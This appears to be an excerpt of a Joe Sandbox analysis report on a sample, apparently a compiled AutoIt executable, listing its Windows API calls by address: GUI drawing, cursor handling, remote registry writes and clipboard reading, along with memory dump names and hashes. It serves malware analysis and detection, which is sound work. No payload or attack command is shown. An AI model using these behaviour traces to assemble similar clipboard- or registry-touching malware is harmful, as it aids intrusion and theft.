                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                                                                                                                              • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 69173610-0
                                                                                                                                                                                                                                                            • Opcode ID: 584a999f89db3cdc510da71c668fa3e335966c035dbf61eb41b3a5421358662a
                                                                                                                                                                                                                                                            • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 584a999f89db3cdc510da71c668fa3e335966c035dbf61eb41b3a5421358662a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                                                                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                                                                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                                                                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                            • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                            • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                                                                                                                            • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __wcsnicmp
                                                                                                                                                                                                                                                            • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                                                                            • API String ID: 1038674560-3360698832
                                                                                                                                                                                                                                                            • Opcode ID: d3b13d2d210588f42260a91b167181014f2011d22ca391bd0a5c30519b55ecdb
                                                                                                                                                                                                                                                            • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3b13d2d210588f42260a91b167181014f2011d22ca391bd0a5c30519b55ecdb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00430773
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00430803
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00430833
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00430863
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00430887
                                                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Cursor$Load
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1675784387-0
                                                                                                                                                                                                                                                            • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                                                                                                                                            • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                                                                                                                            • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                                                                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                                                                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                                                                                                                                                                            • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                                                                                                                                                                            • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                             • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1582027408-0
                                                                                                                                                                                                                                                            • Opcode ID: 8a29764326f71ace7425698184acd64be4b8c6c6fa5793dcd55699e731a1e8e3
                                                                                                                                                                                                                                                            • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a29764326f71ace7425698184acd64be4b8c6c6fa5793dcd55699e731a1e8e3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseConnectCreateRegistry
                                                                                                                                                                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                            • API String ID: 3217815495-966354055
                                                                                                                                                                                                                                                            • Opcode ID: 1613d105b25f0b894bdd56f24aebc34531e7f06dd219b39307bf90ae4898f291
                                                                                                                                                                                                                                                            • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1613d105b25f0b894bdd56f24aebc34531e7f06dd219b39307bf90ae4898f291
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                                                                                                                                                            • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                                                                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                                                                                                                                                                            • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                                                                                                                                            • String ID: ($,$tooltips_class32
                                                                                                                                                                                                                                                            • API String ID: 225202481-3320066284
                                                                                                                                                                                                                                                            • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                                                                                                            • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
• String ID:
• API String ID: 15083398-0
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetWindowRect.USER32(?,?), ref: 00471CF7
• GetClientRect.USER32(?,?), ref: 00471D05
• GetSystemMetrics.USER32(00000007), ref: 00471D0D
• GetSystemMetrics.USER32(00000008), ref: 00471D20
• GetSystemMetrics.USER32(00000004), ref: 00471D42
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
• GetSystemMetrics.USER32(00000007), ref: 00471D79
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
• GetSystemMetrics.USER32(00000008), ref: 00471DAB
• GetSystemMetrics.USER32(00000004), ref: 00471DCF
• SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
• AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
• CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
• SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
• GetClientRect.USER32(?,?), ref: 00471E8A
• GetStockObject.GDI32(00000011), ref: 00471EA6
• SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
• SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
• String ID: @$AutoIt v3 GUI
• API String ID: 867697134-3359773793
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: __wcsicoll$__wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
• API String ID: 790654849-32604322
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
Similarity
• API ID: Window
• String ID: 0
• API String ID: 2353593579-4108050209
• Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
• Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
• Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
• Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
APIs
• GetSysColor.USER32(0000000F), ref: 0044A05E
• GetClientRect.USER32(?,?), ref: 0044A0D1
• SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
• GetWindowDC.USER32(?), ref: 0044A0F6
• GetPixel.GDI32(00000000,?,?), ref: 0044A108
